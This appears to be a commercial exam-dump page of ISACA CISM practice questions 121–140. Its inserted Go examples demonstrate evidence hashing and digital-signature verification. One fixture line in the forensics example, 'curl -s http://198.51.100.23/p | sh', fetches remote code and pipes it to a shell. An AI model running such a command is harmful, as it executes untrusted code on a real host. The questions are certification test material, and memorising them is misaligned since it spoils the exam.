
CISM Certified Information Security Manager is now Stable and With Pass Result | Test Your Knowledge for Free

Exams4sure Dumps

CISM Practice Questions

Certified Information Security Manager

Last Update 3 days ago
Total Questions : 1044

Dive into our fully updated and stable CISM practice test platform, featuring the latest ISACA certification exam questions added this week. Our preparation tool is more than an ISACA study aid; it's a strategic advantage.

Our free ISACA certification practice questions are crafted to reflect the domains and difficulty of the actual exam. The detailed rationales explain the 'why' behind each answer, reinforcing key CISM concepts. Use this test to pinpoint the areas on which to focus your study.

CISM PDF (Printable): $69.65 (65% off $199)
CISM Testing Engine: $78.75 (65% off $225)
CISM PDF + Testing Engine: $87.15 (65% off $249)

Question # 121

Which of the following BEST enables the integration of information security governance into corporate governance?

Options:

A. Well-documented information security policies and standards
B. An information security steering committee with business representation
C. Clear lines of authority across the organization
D. Senior management approval of the information security strategy

Question # 122

A small organization has a contract with a multinational cloud computing vendor. Which of the following would present the GREATEST concern to an information security manager if omitted from the contract?

Options:

A. Right of the subscriber to conduct onsite audits of the vendor
B. Escrow of software code with conditions for code release
C. Authority of the subscriber to approve access to its data
D. Commingling of subscribers' data on the same physical server

Question # 123

Regular vulnerability scanning on an organization's internal network has identified that many user workstations have unpatched versions of software. What is the BEST way for the information security manager to help senior management understand the related risk?

Options:

A. Include the impact of the risk as part of regular metrics.
B. Recommend the security steering committee conduct a review.
C. Update the risk assessment at regular intervals.
D. Send regular notifications directly to senior managers.

Question # 124

To prepare for a third-party forensics investigation following an incident involving malware, the incident response team should:

Options:

A. isolate the infected systems.
B. preserve the evidence.
C. image the infected systems.
D. clean the malware.
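
Preserving evidence for a third-party examiner means, in practice, fixing its integrity at the moment of collection, before any containment or cleanup tool touches the artifacts. The Go program below is an added example written for this page, not material from the question bank: it hashes each collected artifact with SHA-256, writes a sha256sum-style manifest that accompanies the hand-over, and re-verifies the set so that anything altered or lost afterwards is reported. The host name, file names and file contents are constructed for the example.

```go
package main

import (
	"crypto/sha256"
	"encoding/hex"
	"fmt"
	"sort"
	"strings"
)

// EvidenceItem is one artifact collected from an affected host. The names and
// contents used in this example are constructed, not real case data.
type EvidenceItem struct {
	Name string
	Data []byte
}

// Fingerprint returns the hex SHA-256 of an artifact. Recording this value at
// collection time lets the examiner prove the copy they receive is the copy
// that was taken.
func Fingerprint(data []byte) string {
	sum := sha256.Sum256(data)
	return hex.EncodeToString(sum[:])
}

// BuildManifest produces a sorted "hash  name" listing in the layout that
// sha256sum emits; this is what travels with the evidence on hand-over.
func BuildManifest(items []EvidenceItem) string {
	lines := make([]string, 0, len(items))
	for _, it := range items {
		lines = append(lines, Fingerprint(it.Data)+"  "+it.Name)
	}
	sort.Strings(lines)
	return strings.Join(lines, "\n")
}

// VerifyManifest re-hashes every artifact and returns, sorted, the names of
// any whose current hash differs from the recorded one (or that were never
// recorded), plus names present in the manifest but absent from the set
// (evidence lost). An empty result means the set is intact.
func VerifyManifest(manifest string, items []EvidenceItem) []string {
	recorded := map[string]string{}
	for _, line := range strings.Split(manifest, "\n") {
		parts := strings.SplitN(line, "  ", 2)
		if len(parts) != 2 {
			continue
		}
		recorded[parts[1]] = parts[0]
	}
	var bad []string
	seen := map[string]bool{}
	for _, it := range items {
		seen[it.Name] = true
		if recorded[it.Name] != Fingerprint(it.Data) {
			bad = append(bad, it.Name)
		}
	}
	for name := range recorded {
		if !seen[name] {
			bad = append(bad, name)
		}
	}
	sort.Strings(bad)
	return bad
}

// SampleEvidence is a constructed set standing in for a memory capture, a
// suspicious download and a shell history pulled from workstation ws-042.
func SampleEvidence() []EvidenceItem {
	return []EvidenceItem{
		{Name: "ws-042/memory.raw", Data: []byte("PAGE0\x00\x00\x00 constructed memory capture")},
		{Name: "ws-042/Downloads/invoice.exe", Data: []byte("MZ\x90\x00 constructed suspicious binary")},
		{Name: "ws-042/.bash_history", Data: []byte("curl -s http://198.51.100.23/p | sh\n")},
	}
}

func main() {
	items := SampleEvidence()
	manifest := BuildManifest(items)
	fmt.Println(manifest)
	fmt.Println("intact set, mismatches:", VerifyManifest(manifest, items))

	// Running a cleanup tool before hand-over alters an artifact; the manifest
	// now identifies exactly which one no longer matches what was collected.
	cleaned := append([]EvidenceItem(nil), items...)
	cleaned[1] = EvidenceItem{Name: cleaned[1].Name, Data: []byte("quarantined")}
	fmt.Println("after cleanup, mismatches:", VerifyManifest(manifest, cleaned))
}
```

The manifest is only as trustworthy as its custody: store it separately from the artifacts (and ideally sign it or record the hashes in the incident ticket) so that whoever modifies the evidence cannot also rewrite the manifest.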

Question # 125

Labeling information according to its security classification:

Options:

A. enhances the likelihood of people handling information securely.
B. reduces the number and type of countermeasures required.
C. reduces the need to identify baseline controls for each classification.
D. affects the consequences if information is handled insecurely.

Question # 126

A security incident has been reported within an organization. When should an information security manager contact the information owner?

Options:

A. After the incident has been contained
B. After the incident has been mitigated
C. After the incident has been confirmed
D. After the potential incident has been logged

Question # 127

Which of the following processes is MOST important for the success of a business continuity plan (BCP)?

Options:

A. Involving all stakeholders in testing and training
B. Scheduling periodic internal and external audits
C. Including the board and senior management in plan reviews
D. Maintaining copies of the plan at the primary and recovery sites

Question # 128

Which of the following is the BEST course of action when an online company discovers a network attack in progress?

Options:

A. Dump all event logs to removable media
B. Isolate the affected network segment
C. Enable trace logging on all events
D. Shut off all network access points

Question # 129

When management changes the enterprise business strategy, which of the following processes should be used to evaluate the existing information security controls as well as to select new information security controls?

Options:

A. Configuration management
B. Risk management
C. Access control management
D. Change management

Question # 130

Which of the following is the BEST way to reduce the risk associated with a bring your own device (BYOD) program?

Options:

A. Implement a mobile device policy and standard.
B. Provide employee training on secure mobile device practices.
C. Implement a mobile device management (MDM) solution.
D. Require employees to install an effective anti-malware app.

Question # 131

Which of the following is the MOST likely reason for a vulnerability scanner to return incomplete results?

Options:

A. Unauthenticated vulnerability scans are being performed.
B. Scan results are not ingested into a security information and event management (SIEM) tool.
C. Host names have not been fully enumerated.
D. Zero-day vulnerability signatures have not been ingested.

Question # 132

An organization is considering the feasibility of implementing a big data solution to analyze customer data. In order to support this initiative, the information security manager should FIRST:

Options:

A. inventory sensitive customer data to be processed by the solution.
B. determine information security resource and budget requirements.
C. assess potential information security risk to the organization.
D. develop information security requirements for the big data solution.

Question # 133

Which type of policy BEST helps to ensure that all employees, contractors, and third-party users receive formal communication regarding an organization's security program?

Options:

A. Management review policy
B. Business continuity management policy
C. Information security training policy
D. Security incident management policy

Question # 134

Which of the following is the MOST effective way to protect the authenticity of data in transit?

Options:

A. Digital signature
B. Private key
C. Access controls
D. Public key
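
A private key or a public key on its own is key material, not a protection; a digital signature is the construction that binds that key material to the data, so the receiver can check both that the bytes are unchanged and that they came from the holder of the private key. The Go program below is an added example written for this page, not material from the question bank: it uses the standard library's crypto/ed25519 to sign a payload on the sending side and verify it on the receiving side, and shows the two failures a practitioner should expect, a payload altered in transit and a message signed with an impostor's key. The JSON payload and the key pairs are constructed for the example.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"fmt"
)

// SignedMessage is what actually travels across the wire: the payload plus the
// sender's signature over it. The sender's public key is distributed out of
// band (or via a certificate); it never has to be secret, only trusted.
type SignedMessage struct {
	Payload   []byte
	Signature []byte
}

// NewKeyPair generates an Ed25519 key pair. The private key stays with the
// sender; only the public key is shared with receivers.
func NewKeyPair() (ed25519.PublicKey, ed25519.PrivateKey, error) {
	return ed25519.GenerateKey(rand.Reader)
}

// Send signs the payload with the sender's private key.
func Send(priv ed25519.PrivateKey, payload []byte) SignedMessage {
	return SignedMessage{Payload: payload, Signature: ed25519.Sign(priv, payload)}
}

// Receive checks the signature against the public key the receiver trusts for
// that sender. true means the bytes are unchanged and were signed by the holder
// of the matching private key: integrity and authenticity together.
func Receive(trusted ed25519.PublicKey, msg SignedMessage) bool {
	if len(msg.Signature) != ed25519.SignatureSize {
		return false
	}
	return ed25519.Verify(trusted, msg.Payload, msg.Signature)
}

// Demo runs the three cases: a genuine message verifies, a message altered in
// transit does not, and a message signed by an impostor's key does not.
// It returns the three verification results in that order.
func Demo() (genuine, tampered, impostor bool, err error) {
	pub, priv, err := NewKeyPair()
	if err != nil {
		return
	}
	_, impostorPriv, err := NewKeyPair() // an attacker's own key pair
	if err != nil {
		return
	}
	// Constructed payload: a payment instruction, the kind of message whose
	// origin matters more than its secrecy.
	payload := []byte(`{"from":"ops","to":"finance","amount":"12000.00"}`)

	msg := Send(priv, payload)
	genuine = Receive(pub, msg)

	// Same signature, altered amount: the signature no longer matches the bytes.
	altered := msg
	altered.Payload = []byte(`{"from":"ops","to":"finance","amount":"92000.00"}`)
	tampered = Receive(pub, altered)

	// Correct bytes, but signed with a key the receiver does not trust.
	forged := Send(impostorPriv, payload)
	impostor = Receive(pub, forged)
	return
}

func main() {
	genuine, tampered, impostor, err := Demo()
	if err != nil {
		panic(err)
	}
	fmt.Println("genuine message verifies:   ", genuine)
	fmt.Println("tampered payload verifies:  ", tampered)
	fmt.Println("impostor signature verifies:", impostor)
}
```

Note what the receiver actually trusts: the association between the sender and a specific public key. A verifier that accepts any public key shipped alongside the message has checked nothing, which is why the public key must arrive through a channel the receiver already trusts (pinned configuration, a certificate chain, or a key exchanged in person).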

Question # 135

Which of the following should an information security manager do FIRST upon learning that some security hardening settings may negatively impact future business activity?

Options:

A. Perform a risk assessment.
B. Reduce security hardening settings.
C. Inform business management of the risk.
D. Document a security exception.

Question # 136

An organization is going through a digital transformation process, which places the IT organization in an unfamiliar risk landscape. The information security manager has been tasked with leading the IT risk management process. Which of the following should be given the HIGHEST priority?

Options:

A. Identification of risk
B. Analysis of control gaps
C. Design of key risk indicators (KRIs)
D. Selection of risk treatment options

Question # 137

What is the PRIMARY objective of performing a vulnerability assessment following a business system update?

Options:

A. Determine operational losses.
B. Improve the change control process.
C. Update the threat landscape.
D. Review the effectiveness of controls.

Question # 138

A business impact analysis (BIA) BEST enables an organization to establish:

Options:

A. annualized loss expectancy (ALE).
B. recovery methods.
C. total cost of ownership (TCO).
D. restoration priorities.

Question # 139

Which of the following would be an information security manager's PRIMARY challenge when deploying a bring your own device (BYOD) mobile program in an enterprise?

Options:

A. Mobile application control
B. Inconsistent device security
C. Configuration management
D. End user acceptance

Question # 140

Management of a financial institution accepted an operational risk that consequently led to the temporary deactivation of a critical monitoring process. Which of the following should be the information security manager's GREATEST concern with this situation?

Options:

A. Impact on compliance risk
B. Inability to determine short-term impact
C. Impact on the risk culture
D. Deviation from risk management best practices